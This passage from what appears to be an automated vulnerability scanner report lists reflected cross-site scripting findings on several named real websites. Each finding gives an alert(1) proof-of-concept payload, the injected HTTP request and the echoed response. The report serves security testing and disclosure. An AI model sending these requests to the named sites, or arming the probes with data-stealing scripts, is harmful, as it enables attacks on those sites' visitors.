<A HREF = "http://www.newsreaders.com/unix74b10"><script>alert(1)</script>bdf3ff46ede/utilities.html/x22">
...[SNIP]...

4.1343. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newsreaders.com
Path:	/unix/utilities.html/x22

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0b14<script>alert(1)</script>2328a49be9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unixf0b14<script>alert(1)</script>2328a49be9a/utilities.html/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2734

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">





<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
</script>2328a49be9a/utilities.html/x22"><http://www.newsreaders.com/unixf0b14<script>alert(1)</script>2328a49be9a/utilities.html/x22></A>
...[SNIP]...

4.1344. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newsreaders.com
Path:	/unix/utilities.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fed6"><script>alert(1)</script>254f42a5555 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unix/utilities.html1fed6"><script>alert(1)</script>254f42a5555/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2738

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">





<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
<A HREF = "http://www.newsreaders.com/unix/utilities.html1fed6"><script>alert(1)</script>254f42a5555/x22">
...[SNIP]...

4.1345. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newsreaders.com
Path:	/unix/utilities.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d5dc<script>alert(1)</script>eb2a241fe88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unix/utilities.html3d5dc<script>alert(1)</script>eb2a241fe88/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2734

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">





<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
</script>eb2a241fe88/x22"><http://www.newsreaders.com/unix/utilities.html3d5dc<script>alert(1)</script>eb2a241fe88/x22></A>
...[SNIP]...

4.1346. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newsreaders.com
Path:	/unix/utilities.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12334<script>alert(1)</script>20ade9eea3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unix/utilities.html/x2212334<script>alert(1)</script>20ade9eea3f HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2734

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">





<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
</script>20ade9eea3f"><http://www.newsreaders.com/unix/utilities.html/x2212334<script>alert(1)</script>20ade9eea3f></A>
...[SNIP]...

4.1347. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newsreaders.com
Path:	/unix/utilities.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fdf"><script>alert(1)</script>ddc8787967e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unix/utilities.html/x2230fdf"><script>alert(1)</script>ddc8787967e HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2738

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">





<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
<A HREF = "http://www.newsreaders.com/unix/utilities.html/x2230fdf"><script>alert(1)</script>ddc8787967e">
...[SNIP]...

4.1348. http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5b448<script>alert(1)</script>a3a034f5075 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs5b448<script>alert(1)</script>a3a034f5075/009629399 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:07:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs5b448<script>alert(1)</script>a3a034f5075/009629399<br>
...[SNIP]...

4.1349. http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 1cd1b--><script>alert(1)</script>613d39895d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs1cd1b--><script>alert(1)</script>613d39895d4/009629399 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:07:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<script>alert(1)</script>613d39895d4/009629399 -->
...[SNIP]...

4.1350. http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 5816a--><script>alert(1)</script>01ffb216b83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs/0096293995816a--><script>alert(1)</script>01ffb216b83 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:07:41 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<script>alert(1)</script>01ffb216b83 -->
...[SNIP]...

4.1351. http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa322<script>alert(1)</script>48ce99f4b48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs/009629399fa322<script>alert(1)</script>48ce99f4b48 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:07:38 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs/009629399fa322<script>alert(1)</script>48ce99f4b48<br>
...[SNIP]...

4.1352. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 5d81f--><script>alert(1)</script>1c7bb61d234 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs5d81f--><script>alert(1)</script>1c7bb61d234/009629399/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:05:46 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<script>alert(1)</script>1c7bb61d234/009629399/apdxa.htm -->
...[SNIP]...

4.1353. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1a01<script>alert(1)</script>5c075d42855 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubsc1a01<script>alert(1)</script>5c075d42855/009629399/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:05:40 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubsc1a01<script>alert(1)</script>5c075d42855/009629399/apdxa.htm<br>
...[SNIP]...

4.1354. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 830c0<script>alert(1)</script>667d2a8885b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs/009629399830c0<script>alert(1)</script>667d2a8885b/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:06:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs/009629399830c0<script>alert(1)</script>667d2a8885b/apdxa.htm<br>
...[SNIP]...

4.1355. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ad8d0--><script>alert(1)</script>52643a8c339 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs/009629399ad8d0--><script>alert(1)</script>52643a8c339/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:06:10 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<script>alert(1)</script>52643a8c339/apdxa.htm -->
...[SNIP]...

4.1356. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2555c<script>alert(1)</script>531e0e4cf4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs/009629399/apdxa.htm2555c<script>alert(1)</script>531e0e4cf4d HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:06:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs/009629399/apdxa.htm2555c<script>alert(1)</script>531e0e4cf4d<br>
...[SNIP]...

4.1357. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload fd4ac--><script>alert(1)</script>2923402d058 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs/009629399/apdxa.htmfd4ac--><script>alert(1)</script>2923402d058 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:06:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<script>alert(1)</script>2923402d058 -->
...[SNIP]...

4.1358. http://www.paperg.com/jsfb/embed.php [bid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cca3d%3balert(1)//9aef970de53 was submitted in the bid parameter. This input was echoed as cca3d;alert(1)//9aef970de53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfb/embed.php?pid=3922&bid=2123cca3d%3balert(1)//9aef970de53 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:30:44 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=vufrp7pm92h5eh5n690v6buc47; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39354

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123cca3d;alert(1)//9aef970de53 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123cca3d%3balert(1)//9aef970de53';

//-- getting all script elements from document
var scripts = document.getElementsByTagName('script');
...[SNIP]...

4.1359. http://www.paperg.com/jsfb/embed.php [bid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5da04'-alert(1)-'3a2639eb879 was submitted in the bid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfb/embed.php?pid=3922&bid=21235da04'-alert(1)-'3a2639eb879 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:30:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=bj9osp79pdc6rvuque87t7gaf5; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 37179

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL21235da04'-alert(1)-'3a2639eb879 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=21235da04'-alert(1)-'3a2639eb879';

   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];

...[SNIP]...

4.1360. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6c3d'-alert(1)-'805b94c064 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfb/embed.php?pid=3922&bid=2123&e6c3d'-alert(1)-'805b94c064=1 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:31:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=tgpuk9fpo1c961qma9rrunbtf7; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39301

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123&e6c3d'-alert(1)-'805b94c064=1';

   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];
...[SNIP]...

4.1361. http://www.paperg.com/jsfb/embed.php [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db653'-alert(1)-'db295b4a728 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfb/embed.php?pid=3922db653'-alert(1)-'db295b4a728&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:30:24 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=e7mng6c564g6j5k6u2er2d2c96; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39299

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.paperg.com/jsfb/embed.php?pid=3922db653'-alert(1)-'db295b4a728&bid=2123';

   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length
...[SNIP]...

4.1362. http://www.parenthood.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.parenthood.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1907'-alert(1)-'807a8eb3eff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?d1907'-alert(1)-'807a8eb3eff=1 HTTP/1.1
Host: www.parenthood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=bbrk35ahflo8ifh800tav2f6k6; path=/
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 106944

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta htt
...[SNIP]...
<script type="text/javascript">

OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.parenthood.com/index.php?d1907'-alert(1)-'807a8eb3eff=1';
OAS_listpos = 'Top,x01,x02,x03,x04,x05,Middle,Right1,Right2,Left,Left1,Left2,Left3,Bottom,Bottom1,Bottom2,Bottom3,BottomRight';
OAS_target = '_blank';

OAS_rn = new String(Math.random());
OAS_rn
...[SNIP]...

4.1363. http://www.sailinganarchy.com/article_submission.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/article_submission.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdb2"><script>alert(1)</script>eff65952e99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /article_submission.php/8fdb2"><script>alert(1)</script>eff65952e99 HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Apache
